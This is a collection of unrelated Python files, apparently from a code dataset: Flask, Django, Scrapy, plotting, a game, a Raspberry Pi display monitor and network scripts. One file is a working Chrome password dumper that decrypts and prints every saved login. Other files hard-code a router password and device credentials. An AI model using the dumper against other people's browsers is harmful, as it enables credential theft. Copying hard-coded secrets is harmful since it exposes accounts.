  sys.path.append(repo_root)
  try:
    return _CommonChecksImpl(input_api, output_api)
  finally:
    # Always undo the sys.path mutation, even if a check raises.
    sys.path.remove(repo_root)
def CheckChangeOnUpload(input_api, output_api):
  # Presubmit entry point invoked on 'git cl upload'.
  return _CommonChecks(input_api, output_api)
def CheckChangeOnCommit(input_api, output_api):
  # Presubmit entry point invoked on commit.
  return _CommonChecks(input_api, output_api)
| 1,805 | 670 |
import FWCore.ParameterSet.Config as cms
# Ideal geometry, needed for simulation
from SLHCUpgradeSimulations.Geometry.Phase1_R30F12_cmsSimIdealGeometryXML_cff import *
from Geometry.TrackerNumberingBuilder.trackerNumbering2026Geometry_cfi import *
| 249 | 87 |
import os
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
from datetime import timezone, datetime, timedelta
def chrome_date_and_time(chrome_data):
    """Convert a Chrome/WebKit timestamp to a naive ``datetime``.

    Chrome stores times as microseconds elapsed since 1601-01-01.
    """
    webkit_epoch = datetime(1601, 1, 1)
    return webkit_epoch + timedelta(microseconds=chrome_data)
def fetching_encryption_key():
    """Read Chrome's 'Local State' file and return the decrypted AES key.

    The key lives base64-encoded under os_crypt/encrypted_key, prefixed
    with the 5-byte literal b'DPAPI' and protected with the Windows DPAPI.
    """
    # C: => Users => <Your_Name> => AppData => Local => Google => Chrome
    # => User Data => Local State
    local_computer_directory_path = os.path.join(
        os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome",
        "User Data", "Local State")
    # 'with' guarantees the handle is closed (the original leaked it).
    with open(local_computer_directory_path, "r", encoding="utf-8") as f:
        local_state_data = json.load(f)
    # Decode the key from base64, then strip the 'DPAPI' prefix.
    encryption_key = base64.b64decode(
        local_state_data["os_crypt"]["encrypted_key"])[5:]
    # Unprotect with the current user's DPAPI key.
    return win32crypt.CryptUnprotectData(encryption_key, None, None, None, 0)[1]
def password_decryption(password, encryption_key):
    """Decrypt one Chrome password blob.

    Modern (v10+) blobs are AES-GCM: 3-byte version prefix, 12-byte IV,
    ciphertext, 16-byte auth tag. Older blobs fall back to raw DPAPI.
    Returns the literal 'No Passwords' when neither scheme works.
    """
    try:
        iv = password[3:15]
        ciphertext = password[15:]
        cipher = AES.new(encryption_key, AES.MODE_GCM, iv)
        # Drop the trailing 16-byte GCM tag; the tag is not verified here.
        return cipher.decrypt(ciphertext)[:-16].decode()
    except Exception:
        # Narrowed from a bare 'except:' which also swallowed SystemExit.
        try:
            return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
        except Exception:
            return "No Passwords"
def main():
    """Dump every saved Chrome login (URLs, username, decrypted password,
    creation / last-used timestamps) to stdout."""
    key = fetching_encryption_key()
    # NOTE(review): the profile folder is usually 'Default' (capital D) —
    # confirm this lowercase path works on the targeted installs.
    db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
                           "Google", "Chrome", "User Data", "default", "Login Data")
    # Work on a copy: Chrome keeps the live database locked while running.
    filename = "ChromePasswords.db"
    shutil.copyfile(db_path, filename)
    # connecting to the database
    db = sqlite3.connect(filename)
    cursor = db.cursor()
    # 'logins' table has the data
    cursor.execute(
        "select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins "
        "order by date_last_used")
    # iterate over all rows
    for row in cursor.fetchall():
        main_url = row[0]
        login_page_url = row[1]
        user_name = row[2]
        decrypted_password = password_decryption(row[3], key)
        date_of_creation = row[4]
        last_usuage = row[5]
        if user_name or decrypted_password:
            print(f"Main URL: {main_url}")
            print(f"Login URL: {login_page_url}")
            print(f"User name: {user_name}")
            print(f"Decrypted Password: {decrypted_password}")
        else:
            continue
        # 86400000000 µs == exactly one day past the WebKit epoch; Chrome
        # uses it as a sentinel for "no timestamp".
        if date_of_creation != 86400000000 and date_of_creation:
            print(f"Creation date: {str(chrome_date_and_time(date_of_creation))}")
        if last_usuage != 86400000000 and last_usuage:
            print(f"Last Used: {str(chrome_date_and_time(last_usuage))}")
        print("=" * 100)
    cursor.close()
    db.close()
    try:
        # trying to remove the copied db file as
        # well from local computer
        os.remove(filename)
    except:
        pass
if __name__ == "__main__":
    main()
| 3,043 | 1,189 |
import os
from flask import Flask, request, redirect, url_for, render_template, send_from_directory, jsonify
from werkzeug import secure_filename
import uuid
app = Flask(__name__)
# Folders for raw submissions, journalist replies, and the static client.
app.config['UPLOAD_FOLDER'] = 'upload/'
app.config['REPLY_FOLDER'] = 'replies/'
app.config['CLIENT_FOLDER'] = 'client/'
def upload_file_to_folder(folder, filename):
    """Write the current request's 'content' form field to folder/filename.

    Returns True when non-empty content was written, False otherwise.
    """
    content = request.form['content']
    if content:
        # 'with' guarantees the handle is closed even if the write fails
        # (the original leaked the handle on error).
        with open(os.path.join(folder, filename), "w+") as out:
            out.write(content)
        return True
    return False
@app.route('/api/reply_to/<codename>', methods=['POST'])
def reply(codename):
    # Store a reply for a source: normalise the codename (trim, drop '+',
    # join the words) and write it as <codename>.json in the reply folder.
    codename = "".join(codename.strip().replace("+", "").split(" "))
    filename = secure_filename(codename + ".json")
    print(filename)
    if upload_file_to_folder(app.config['REPLY_FOLDER'], filename):
        return "Ok"
    return "Content is empty", 405
@app.route('/api/fetch_reply/<codename>', methods=['GET'])
def fetch_reply(codename):
    # Serve the stored reply for a source, using the same codename
    # normalisation as reply() so both map to one filename.
    codename = "".join(codename.strip().replace("+", "").split(" "))
    filename = secure_filename(codename + ".json")
    return send_from_directory(app.config['REPLY_FOLDER'], filename)
@app.route('/api/submit', methods=['POST'])
def submit():
    """Store an anonymous submission under a random UUID and return the id.

    Cleanup vs. original: removed the dead commented-out duplicate of the
    body and renamed the local that shadowed the builtin ``id``.
    """
    submission_id = str(uuid.uuid4())
    filename = secure_filename(submission_id + ".asc")
    if upload_file_to_folder(app.config['UPLOAD_FOLDER'], filename):
        return submission_id
    return "Content is empty", 405
@app.route('/api/submissions', methods=['GET'])
def list_submissions():
    """List uploaded submission filenames, newest first (by mtime)."""
    files = os.listdir(app.config['UPLOAD_FOLDER'])
    # Hide the repo placeholder. The original's unconditional remove()
    # raised ValueError whenever .gitignore was absent.
    if ".gitignore" in files:
        files.remove(".gitignore")
    return jsonify(files=sorted(files, key=lambda f:
        os.stat(os.path.join(app.config['UPLOAD_FOLDER'], f)).st_mtime, reverse=True))
@app.route('/api/submissions/<path:path>', methods=['GET'])
def fetch_submission(path):
    # Serve one stored submission file by name.
    return send_from_directory(app.config['UPLOAD_FOLDER'], path)
@app.route('/')
def default():
    # Root URL serves the client's index page.
    return serve_client('index.html')
@app.route('/<path:path>')
def serve_client(path):
    # Static file server for the bundled client app.
    return send_from_directory(app.config['CLIENT_FOLDER'], path)
if __name__ == "__main__":
    # Development server only; not for production use.
    app.run(port=5011, debug=True)
| 2,437 | 841 |
from tkinter import *
from tkinter import filedialog
import os
def openFile():
    """Ask the user for a text file and open it with the OS default app."""
    filepath = filedialog.askopenfilename(initialdir="/",title="Open file",filetypes= (("text files","*.txt"),("all files","*.*")))
    # askopenfilename returns '' when the dialog is cancelled; the original
    # then crashed inside os.startfile.
    if filepath:
        os.startfile(filepath)  # os.startfile is Windows-only
# Minimal window: a single button that opens the file picker.
window = Tk()
button = Button(text="OpenFile",command=openFile)
button.pack()
window.mainloop()
from django.conf.urls import patterns, include, url
from ats.views import *
# NOTE(review): patterns() was deprecated in Django 1.8 and removed in
# 1.10 — this module targets an older Django.
urlpatterns = patterns('',
    # Examples:
    # url(r'^$', 'bcauth_project.views.home', name='home'),
    # url(r'^blog/', include('blog.urls')),
    url(r'^job/(?P<job_id>\d+)/', JobView.as_view(), name='ats_job'),
    url(r'^jobs/', JobListView.as_view(), name='ats_jobs'),
    url(r'^applicants/', ApplicantListView.as_view(), name='ats_applicants'),
    url(r'^create/', JobCreateView.as_view(), name='ats_create'),
    url(r'^users/', UserListView.as_view(), name='ats_users'),
    url(r'^osrc/', GitHubListView.as_view(), name='ats_osrc'),
    url(r'^apply/(?P<job_id>\d+)/', ApplyView.as_view(), name='ats_apply'),
)
| 703 | 276 |
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import argparse
parser = argparse.ArgumentParser(
    formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
    "--T", type=int, default=46,
    help="Time-horizon.")
args = parser.parse_args()
T = args.T
# Load the value function computed by value iteration for horizon T.
data_dir = 'dataForVI'
file_path = data_dir+'/'+'Vn'+str(T)+'.npy'
v = np.load(file_path)
df = pd.DataFrame(v)
# df = pd.read_csv(file_path)
y = df.values
# Plot and save the curve, then display it interactively.
plt.plot(y)
plt.savefig('plot_value.png')
plt.show()
print('Done')
import time
import datetime
import threading
from get_net_info import RaspberryMonitorNetSpeed as rmn
import subprocess
import Adafruit_SSD1306
import Adafruit_GPIO.SPI as SPI
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
# Raspberry Pi pin configuration:
RST = None     # on the PiOLED this pin isnt used
# Note the following are only used with SPI:
DC = 23
SPI_PORT = 0
SPI_DEVICE = 0
# 128x64 display with hardware I2C:
disp = Adafruit_SSD1306.SSD1306_128_64(rst=RST)
# Initialize library.
disp.begin()
# Clear display.
disp.clear()
disp.display()
# Create blank image for drawing.
# Make sure to create image with mode '1' for 1-bit color.
width = disp.width
height = disp.height
image = Image.new('1', (width, height))
# Get drawing object to draw on image.
draw = ImageDraw.Draw(image)
# Draw a black filled box to clear the image.
draw.rectangle((0,0,width,height), outline=0, fill=0)
# Draw some shapes.
# First define some constants to allow easy resizing of shapes.
padding = -2
top = padding
bottom = height-padding
# Move left to right keeping track of the current x position for drawing shapes.
x = 2
font = ImageFont.load_default()
# Local IP shown on the first display row.
IP = subprocess.check_output(["hostname", "-I"]).split()[0]
print ('Local IP :'+str(IP))
# [download, upload] speeds shared with the poller thread; -1 == unknown.
ns = [-1, -1]
def network_speed():
    # Background worker: refresh the global up/down speeds once a second.
    global ns
    # SECURITY(review): router credentials are hard-coded here — move them
    # to configuration or environment variables.
    b = rmn('admin', 'Sakuna0711')
    while True:
        time.sleep(1)
        ns = b.get_human_speed()
#%%
def main():
    # Start the network-speed poller as a daemon so it dies with the
    # process, then refresh the OLED once a second with system stats.
    tmp = threading.Thread(target=network_speed)
    tmp.setDaemon(True)
    tmp.start()
    while True:
        try:
            draw.rectangle((0,0,width,height), outline=0, fill=0)
            # Shell pipelines gather CPU load, memory and disk usage.
            cmd = "top -bn1 | grep load | awk '{printf \"CPU Load: %.2f\", $(NF-2)}'"
            CPU = subprocess.check_output(cmd, shell = True )
            cmd = "free -m | awk 'NR==2{printf \"Mem: %s/%sMB %.2f%%\", $3,$2,$3*100/$2 }'"
            MemUsage = subprocess.check_output(cmd, shell = True )
            cmd = "df -h | awk '$NF==\"/\"{printf \"Disk: %d/%dGB %s\", $3,$2,$5}'"
            Disk = subprocess.check_output(cmd, shell = True )
            # Write some text.
            draw.text((x, top), "IP: " + str(IP), font=font, fill=255)
            draw.text((x, top+8), 'U/S: ' + str(ns[1]), font=font, fill=255)
            draw.text((x, top+16), 'D/S: ' + str(ns[0]), font=font, fill=255)
            draw.text((x, top+25), str(CPU), font=font, fill=255)
            draw.text((x, top+33), str(MemUsage), font=font, fill=255)
            draw.text((x, top+41), str(Disk), font=font, fill=255)
            # Push the rendered frame to the display.
            disp.image(image)
            disp.display()
            time.sleep(1)
        except KeyboardInterrupt:
            exit(0)
#%%
if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        # Ctrl-C exits quietly.
        pass
# Rock, Paper, Scissors, Lizard, Spock - Advanced
# rpsls_adv.py for Python 3.4 | Written by Alex Vear
# Written: 19th December 2015 | Modified: 22nd December 2015
# Public domain. No rights reserved.
import random

# Game table: each move (lower-case) maps to the two moves it defeats.
# Replaces five near-identical if/elif branches that each duplicated the
# winner logic; behaviour (accepted spellings and printed text) is unchanged.
BEATS = {
    'rock': ('scissors', 'lizard'),
    'paper': ('rock', 'spock'),
    'scissors': ('paper', 'lizard'),
    'spock': ('rock', 'scissors'),
    'lizard': ('paper', 'spock'),
}

playAgain='y'
while playAgain=='y' or playAgain=='Y':
    win=0
    print("\nScissors cuts Paper \nPaper covers Rock \nRock crushes Lizard \nLizard poisons Spock \nSpock smashes Scissors \nScissors decapitates Lizard \nLizard eats Paper \nPaper disproves Spock \nSpock vaporizes Rock \n(and as it always has) Rock crushes Scissors. \n")
    for i in range(0,3):  # best of three rounds
        play=input('Rock, Paper, Scissors, Lizard, Spock!\n\nPlayer picks: ')
        opp=random.choice(['rock', 'paper', 'scissors', 'lizard', 'spock'])
        print('Sheldon picked:', opp)
        canon = play.lower()
        if opp==canon:
            print('Tie')
        # As before, only the all-lower-case or Capitalised spellings count.
        elif canon in BEATS and play in (canon, canon.capitalize()):
            if opp in BEATS[canon]:
                print('You Won')
                win=win+1
            else:
                print('You Lose')
        else:
            print('Invalid Option')
    print('\nYour Score: ', win, '/3\n')
    playAgain=input("Would you like to play again? 'y' or 'n'\n")
print('\nThanks for playing.\n')
"""
==========================
FastICA on 2D point clouds
==========================
Illustrate visually the results of :ref:`ICA` vs :ref:`PCA` in the
feature space.
Representing ICA in the feature space gives the view of 'geometric ICA':
ICA is an algorithm that finds directions in the feature space
corresponding to projections with high non-Gaussianity. These directions
need not be orthogonal in the original feature space, but they are
orthogonal in the whitened feature space, in which all directions
correspond to the same variance.
PCA, on the other hand, finds orthogonal directions in the raw feature
space that correspond to directions accounting for maximum variance.
Here we simulate independent sources using a highly non-Gaussian
process, 2 student T with a low number of degrees of freedom (top left
figure). We mix them to create observations (top right figure).
In this raw observation space, directions identified by PCA are
represented by green vectors. We represent the signal in the PCA space,
after whitening by the variance corresponding to the PCA vectors (lower
left). Running ICA corresponds to finding a rotation in this space to
identify the directions of largest non-Gaussianity (lower right).
"""
print __doc__  # NOTE(review): Python 2 print statement -- this example predates py3.
# Authors: Alexandre Gramfort, Gael Varoquaux
# License: BSD
import numpy as np
import pylab as pl
from sklearn.decomposition import PCA, FastICA
###############################################################################
# Generate sample data
rng = np.random.RandomState(42)
# Heavy-tailed (Student t, df=1.5) sources: deliberately highly non-Gaussian.
S = rng.standard_t(1.5, size=(20000, 2))
S[:, 0] *= 2.
# Mix data
A = np.array([[1, 1], [0, 2]])  # Mixing matrix
X = np.dot(S, A.T)  # Generate observations
pca = PCA()
S_pca_ = pca.fit(X).transform(X)
ica = FastICA(random_state=rng)
S_ica_ = ica.fit(X).transform(X)  # Estimate the sources
# Normalise estimated sources to unit variance for plotting.
S_ica_ /= S_ica_.std(axis=0)
###############################################################################
# Plot results
def plot_samples(S, axis_list=None):
    """Scatter-plot 2D samples, optionally overlaying direction vectors.

    :param S: sample array indexed as S[:, 0] / S[:, 1] -- assumed shape
        (n_samples, 2); TODO confirm against callers.
    :param axis_list: optional iterable of 2x2 arrays (PCA / ICA axes);
        each is normalised by its std and drawn as a quiver arrow.
    """
    pl.scatter(S[:, 0], S[:, 1], s=2, marker='o', linewidths=0, zorder=10)
    if axis_list is not None:
        # One colour per overlay (green for the first, red for the second).
        colors = [(0, 0.6, 0), (0.6, 0, 0)]
        for color, axis in zip(colors, axis_list):
            axis /= axis.std()
            x_axis, y_axis = axis
            # Trick to get legend to work
            pl.plot(0.1 * x_axis, 0.1 * y_axis, linewidth=2, color=color)
            # pl.quiver(x_axis, y_axis, x_axis, y_axis, zorder=11, width=0.01,
            pl.quiver(0, 0, x_axis, y_axis, zorder=11, width=0.01,
                      scale=6, color=color)
    # Axes cross plus a fixed viewport so all four subplots share one frame.
    pl.hlines(0, -3, 3)
    pl.vlines(0, -3, 3)
    pl.xlim(-3, 3)
    pl.ylim(-3, 3)
    pl.xlabel('x')
    pl.ylabel('y')
pl.subplot(2, 2, 1)
plot_samples(S / S.std())
pl.title('True Independent Sources')
# NOTE(review): FastICA.get_mixing_matrix() was removed in later scikit-learn
# releases (the `mixing_` attribute replaces it) -- confirm the pinned version.
axis_list = [pca.components_.T, ica.get_mixing_matrix()]
pl.subplot(2, 2, 2)
plot_samples(X / np.std(X), axis_list=axis_list)
pl.legend(['PCA', 'ICA'], loc='upper left')
pl.title('Observations')
pl.subplot(2, 2, 3)
plot_samples(S_pca_ / np.std(S_pca_, axis=0))
pl.title('PCA scores')
pl.subplot(2, 2, 4)
plot_samples(S_ica_ / np.std(S_ica_))
pl.title('ICA estimated sources')
# left, bottom, right, top, wspace, hspace
pl.subplots_adjust(0.09, 0.04, 0.94, 0.94, 0.26, 0.26)
pl.show()
| 3,222 | 1,149 |
class SupabaseError(Exception):
    """Base class for all supabase errors.

    :param message: A human-readable error message string.
    """

    def __init__(self, message):
        super().__init__(message)
class ClientConnectorError(SupabaseError):
    """Supabase error variant for client connection failures.

    The redundant ``__init__`` that merely forwarded ``message`` was removed;
    ``SupabaseError.__init__`` already accepts and stores it.
    """
class QueryError(SupabaseError):
    """Supabase error variant for query failures.

    The redundant ``__init__`` that merely forwarded ``message`` was removed;
    ``SupabaseError.__init__`` already accepts and stores it.
    """
class InvalidRangeError(SupabaseError):
    """Supabase error variant for invalid range arguments.

    The redundant ``__init__`` that merely forwarded ``message`` was removed;
    ``SupabaseError.__init__`` already accepts and stores it.
    """
class UnexpectedValueTypeError(SupabaseError):
    """Supabase error variant for values of an unexpected type.

    The redundant ``__init__`` that merely forwarded ``message`` was removed;
    ``SupabaseError.__init__`` already accepts and stores it.
    """
import os, sys
from PIL import Image
### TERMINAL ARGUMENTS ###
# -h := help
# -q := quiet
# -single := forced one page per slide
args = sys.argv[1:]
# -h, print README and quit
if "-h" in args:
    with open('./README.md') as f:
        print(f.read())
    quit()
# -q, toggle print statements
loud = True  # module-wide verbosity flag, read by verifyDirectory() and main()
if "-q" in args:
    loud = False
# -single, toggle forced single image per slide
double = True  # when True, two tall pages may share one slide
if "-single" in args:
    double = False
def verifyDirectory(dirname):
    """Ensure `dirname` exists, creating it if needed; abort the script on failure."""
    if os.path.isdir(dirname):
        return
    try:
        os.mkdir(dirname)
    except OSError:
        if loud: print("Could not create {} directory.".format(dirname))
        quit()
verifyDirectory('./Sheets')  # input folder (created empty if missing)
if not os.listdir('./Sheets'): # Empty sheets directory
    if loud: print("No images to convert.")
verifyDirectory('./Slides')  # output folder
### IMAGE MANIPULATION ###
# Is better suited for a double slide (two tall images side by side)?
def isTall(img):
    """Return True when `img` is narrower than the 16:9 slide aspect ratio."""
    width, height = img.size
    return width / height < 16 / 9
# White dimensioned BG image
def bgImg(size):
    """Return a new all-white RGB image of the given (width, height) size."""
    return Image.new('RGB', size, (255,255,255))
def singleImage(img):
    """Center `img` on a white 16:9 canvas just large enough to hold it."""
    w, h = img.size
    if w / h > (16 / 9):
        canvas_size = w, int((9 / 16) * w)   # wide image: pad vertically
    else:
        canvas_size = int((16 / 9) * h), h   # tall image: pad horizontally
    canvas = bgImg(canvas_size)
    offset = (int((canvas_size[0] - w) / 2), int((canvas_size[1] - h) / 2))
    canvas.paste(img, offset)  # centered on the white background
    return canvas
def twoImage(img1, img2):
    """Place two images side by side, vertically centered, then letterbox to 16:9."""
    w1, h1 = img1.size
    w2, h2 = img2.size
    combined = bgImg((w1 + w2, max(h1, h2)))
    if h1 < h2:
        combined.paste(img1, (0, int((h2 - h1) / 2)))
        combined.paste(img2, (w1, 0))
    else:
        # h1 == h2 behaves identically through either branch.
        combined.paste(img1, (0, 0))
        combined.paste(img2, (w1, int((h1 - h2) / 2)))
    return singleImage(combined)
def main():
    """Convert the images in ./Sheets into 16:9 slide images in ./Slides.

    When `double` is set, adjacent tall pages are paired two-per-slide;
    otherwise every page becomes its own slide. Output files are numbered
    sequentially as 0.png, 1.png, ...
    """
    imageFormats = ('.jpg', '.png') # If adding image formats, check compatibility with PIL.
    pages = list(filter(lambda x: x.endswith(imageFormats), sorted(os.listdir('./Sheets'))))
    pages = list(map(lambda x: Image.open('./Sheets/{}'.format(x)), pages))
    os.chdir('./Slides')
    filenum = 0
    if double:
        while pages:
            if not pages[1:]:  # exactly one page left
                singleImage(pages[0]).save('{}.png'.format(filenum))
                if loud: print('e',pages[0])
                break
            elif isTall(pages[0]) and isTall(pages[1]):
                twoImage(pages[0], pages[1]).save('{}.png'.format(filenum))
                if loud: print('d',pages[0],pages[1])
                pages = pages[2:]
            else:
                singleImage(pages[0]).save('{}.png'.format(filenum))
                if loud: print('s',pages[0])
                # BUG FIX: the consumed page must be dropped here -- previously
                # this branch looped forever re-saving the same image.
                pages = pages[1:]
            filenum += 1
    else: # -single
        for page in pages:
            singleImage(page).save('{}.png'.format(filenum))
            filenum += 1
if __name__ == "__main__":
    main()  # convert ./Sheets into ./Slides using the flags parsed above
| 3,085 | 1,163 |
'''
Parse coverage checker html files.
Write out data to a csv.
INPUT: html files in MY_DATA_FOLDERS
OUTPUT: csv file called OUTPUT_FILE
'''
from os import walk
import re
MY_DATA_FOLDERS = ["cov_checker"] # Folder to be processed
OUTPUT_FILE = "output.csv" # csv output result
# Module-level accumulators (re)filled by scan_all_files().
# NOTE: "SEVICES" is a historical misspelling kept for compatibility.
DIGITAL_SEVICES = set()
CHANNELS = set()
MYDATABASE = []
def findWithPattern(mystr, startPattern, endPattern):
    """
    Find the substring delimited by <startPattern> and <endPattern> in <mystr>.

    Args:
        mystr: original string.
        startPattern: marker preceding the wanted text.
        endPattern: marker following the wanted text.
    Returns:
        A pair (found, remainder). When either marker is missing, `found`
        is "" and `remainder` is the portion of the string scanned so far
        (the full string if the start marker is absent, the text after the
        start marker if only the end marker is absent).
    """
    start = mystr.find(startPattern)
    if start == -1:
        return "", mystr
    tail = mystr[start + len(startPattern):]
    end = tail.find(endPattern)
    if end == -1:
        return "", tail
    return tail[:end], tail[end + len(endPattern):]
# ------------FIRST PHASE----------------
# 1. Read through all the data files
# 2. Generate list of DIGITAL_SEVICES and CHANNELS
# 3. Log all the data into MYDATABASE
# Append-binary handle shared with scan_all_files(). NOTE(review): writing
# str rows to an "ab+" handle only works on Python 2; the print statements
# below confirm this script targets Python 2.
my_output_file = open (OUTPUT_FILE, "ab+")
def scan_all_files(log_data):
    """Scan every file under MY_DATA_FOLDERS and harvest services/channels.

    :param log_data: when False, only (re)populate the global DIGITAL_SEVICES
        and CHANNELS sets; when True, additionally write one csv row per file
        to the module-level my_output_file (so the column set collected in the
        first pass is used consistently in the second).
    """
    global DIGITAL_SEVICES
    global CHANNELS
    global MYDATABASE
    DIGITAL_SEVICES = set()
    CHANNELS = set()
    MYDATABASE = []
    for mypath in MY_DATA_FOLDERS:
        # Process each folder
        print "Reading folder " + mypath
        # Retrieve all file in the folder
        flist = []
        for (dirpath, dirnames, filenames) in walk(mypath):
            flist.extend(filenames)
            break
        # Process each file in the folder
        count = 0
        for filename in flist:
            count = count + 1
            if (count%1000==0):
                print ("Processing file {0!s}000th".format(count/1000))
            with open (mypath + "/" + filename, "r") as myfile:
                # Read the file
                data=myfile.read()
                # Extract signalQuality
                signalQuality,data = findWithPattern(data,"This address","signal");
                # Map the free-text blurb onto a known keyword ("" = unknown).
                for signalType in ["good","variable","poor",""]:
                    if (signalQuality.find(signalType)>-1):
                        signalQuality = signalType
                        break;
                # Extract transmitterName
                transmitterName,data = findWithPattern(data,"<strong>","</strong> transmitter");
                transmitterName = transmitterName
                # Extract transmitterRegion
                transmitterRegion,data = findWithPattern(data,">"," region</a>");
                if (transmitterRegion=="Detailed view"):
                    transmitterRegion=""
                # Extract list of available digitalServices
                digitalServices=set()
                digitalService,data = findWithPattern(data,"<li class=\"reception_option ","\">")
                while digitalService:
                    digitalServices.add(digitalService)
                    digitalService,data = findWithPattern(data,"<li class=\"reception_option ","\">")
                DIGITAL_SEVICES = DIGITAL_SEVICES.union(set(digitalServices))
                # Extract list of available channels
                channels=set()
                channel,data = findWithPattern(data,"<span class=\"alt\">","</span>")
                while channel:
                    channels.add(channel)
                    channel,data = findWithPattern(data,"<span class=\"alt\">","</span>")
                CHANNELS = CHANNELS.union(set(channels))
                # Store the record into database
                if log_data:
                    # One csv row: fixed columns, then a 0/1 flag per known
                    # service and channel (column order fixed by the caller).
                    row = {'code':filename.split(".")[0],
                           'signalQuality':signalQuality,
                           'transmitterName':transmitterName,
                           'transmitterRegion':transmitterRegion,
                           'digitalServices':digitalServices,
                           'channels':channels}
                    rowStr = "{0!s},{1!s},{2!s},{3!s}".format(row['code'], row['signalQuality'], row['transmitterName'], row['transmitterRegion'])
                    for service in DIGITAL_SEVICES:
                        rowStr =rowStr + ',{0:d}'.format(int(service in row['digitalServices']))
                    for channel in CHANNELS:
                        rowStr =rowStr + ',{0:d}'.format(int(channel in row['channels']))
                    my_output_file.write(rowStr + "\n")
print "------------FIRST PHASE----------------"
# 1. get the DIGITAL_SEVICES and CHANNELS
scan_all_files(False)
# Set the order of DIGITAL_SEVICES and CHANNELS in the csv file
DIGITAL_SEVICES = sorted(DIGITAL_SEVICES)
CHANNELS = sorted(CHANNELS)
# Genearate the column name list
headerStr = "{0!s},{1!s},{2!s},{3!s}".format('postal.code', 'quality.terrestrial.tv.signal', 'transmitter.name', 'transmitter.region')
for service in DIGITAL_SEVICES:
headerStr =headerStr + ',service.{0!s}'.format(service)
for channel in CHANNELS:
headerStr =headerStr + ',channel.{0!s}'.format(channel)
my_output_file.write(headerStr + "\n")
print "------------SECOND PHASE----------------"
# 2. ouput into csv file for each row in MYDATABASE
scan_all_files(True)
my_output_file.close()
# ------------FINISH----------------
print "DONE"
| 5,395 | 1,617 |
import glob
import sys
import os
sys.path.insert(0,os.path.abspath("../../../src/"))
import pyabf
if __name__=="__main__":
PATH=R"X:\Data\projects\2017-01-09 AT1-Cre mice\2017-01-09 global expression NTS\data"
for fname in sorted(glob.glob(PATH+"/*.abf")):
abf=pyabf.ABF(fname)
if not abf.commentsExist:
continue
print(abf.ID,abf.commentTags)
print("DONE") | 405 | 164 |
"""keywords"""
def f(a, b=None, c=None):
    """Return (a + b) * c; both b and c must be supplied for numeric args."""
    total = a + b
    return total * c
def f2(**kw):
    """Return the sum of all keyword-argument values (0 when none given)."""
    return sum(kw.values())
def main():
    """Exercise keyword-argument handling.

    TestError is provided by the surrounding test harness (not defined in
    this file) -- presumably it asserts its argument is truthy.
    """
    TestError( f(1, b=2, c=3) == 9) ## inorder works in javascript mode
    TestError( f(1, c=3, b=2) == 9) ## out of order fails in javascript mode
    TestError( f2(x=1,y=2) == 3 )
from flask import render_template
from flask_login import login_required
from imp_flask.blueprints import products
from imp_flask.models.imps import Product, Mod
from imp_flask.forms.product import Product as ProductForm
@products.route('/', defaults=dict(page=1))
@products.route('/page/<int:page>')
@login_required
def index(page):
    """List all products, 20 per page, ordered by id."""
    page = max(page, 1)  # clamp non-positive page numbers to the first page
    pagination = Product.query.order_by('id').paginate(page, per_page=20, error_out=False)
    return render_template('imp_flask_products.html', showgroup=True, pagination=pagination)
@products.route('/group/<group>', defaults=dict(page=1))
@products.route('/group/<group>/page/<int:page>')
@login_required
def showgroup(group, page):
    """List the products of a single group, 20 per page, ordered by id."""
    page = max(page, 1)  # clamp non-positive page numbers to the first page
    pagination = Product.query.filter(Product.group == group).order_by('id').paginate(page, per_page=20, error_out=False)
    return render_template('imp_flask_products.html', showgroup=False, pagination=pagination)
@products.route('/add', methods=['GET', 'POST'])
@login_required
def addproduct():
    """Render the new-product form and handle its submission.

    Fixes: the route previously accepted only GET, so
    form.validate_on_submit() (which requires a POST/PUT request) could
    never succeed; Mod.query.all() was also executed twice per request.
    """
    form = ProductForm()
    mods = Mod.query.all()
    modlist = [(mod.id, mod.name) for mod in mods]
    form.gainmods.choices = modlist
    form.losemods.choices = modlist
    if form.validate_on_submit():
        return 'sumtin'
    return render_template('imp_flask_newproduct.html', form=form, mods=mods)
| 1,372 | 481 |
#
# Example From:
# https://xrdocs.io/application-hosting/tutorials/2016-08-15-netmiko-and-napalm-with-ios-xr-quick-look/
#
from napalm import get_network_driver
import pprint
driver = get_network_driver('iosxr')
# NOTE(review): hard-coded lab credentials ('cisco'/'cisco') -- tutorial only,
# never use literal credentials in production code.
device = driver('172.16.1.13', 'cisco', 'cisco')
device.open()
pprint.pprint(device.get_facts())       # dump device facts
pprint.pprint(device.get_interfaces())  # dump per-interface details
device.close()
| 370 | 159 |
from .segmenter import Segmenter
| 33 | 10 |
import scrapy
class VozSpider(scrapy.Spider):
    """Crawl the voz.vn 'chuyen-tro-linh-tinh' forum and export thread texts.

    Fix: ``.get()`` on the title xpath could return None for threads whose
    markup differs, making ``.strip()`` raise AttributeError; ``get(default='')``
    keeps the item pipeline alive for such pages.
    """
    name = 'voz'
    start_urls = ['https://voz.vn/f/chuyen-tro-linh-tinh.17/']
    # One timestamped UTF-8 JSON feed file per run.
    custom_settings = { 'FEED_URI': "voz_%(time)s.json",
                        'FEED_FORMAT': 'json',
                        'FEED_EXPORT_ENCODING': 'utf-8'}

    def parse(self, response):
        """Walk the forum index, scheduling one request per thread."""
        print("Current URL: {}".format(response.url))
        # Stop once the second index page is reached (only page 1 is wanted).
        if "https://voz.vn/f/chuyen-tro-linh-tinh.17/page-2" in response.url:
            return
        post_urls = response.xpath('//div[@class="structItem-title"]//a/@href').extract()
        for url_item in post_urls:
            yield scrapy.Request('https://voz.vn' + url_item, callback=self.content_parse)
        next_page = response.xpath('//a[contains(@class, "pageNav-jump--next")]//@href').get()
        if next_page is not None:
            next_page = response.urljoin(next_page)
            yield scrapy.Request(next_page, callback=self.parse)

    def content_parse(self, response):
        """Yield one item per thread page and follow the thread's pagination."""
        yield {
            'url': response.url,
            'title': response.xpath('//h1[contains(@class, "p-title-value")]/text()').get(default='').strip(),
            'text': '[_SEP_]'.join(response.xpath('//article[@class="message-body js-selectToQuote"]//div[contains(@class, "bbWrapper")]/text()[not(ancestor::blockquote)]').extract()).strip(),
        }
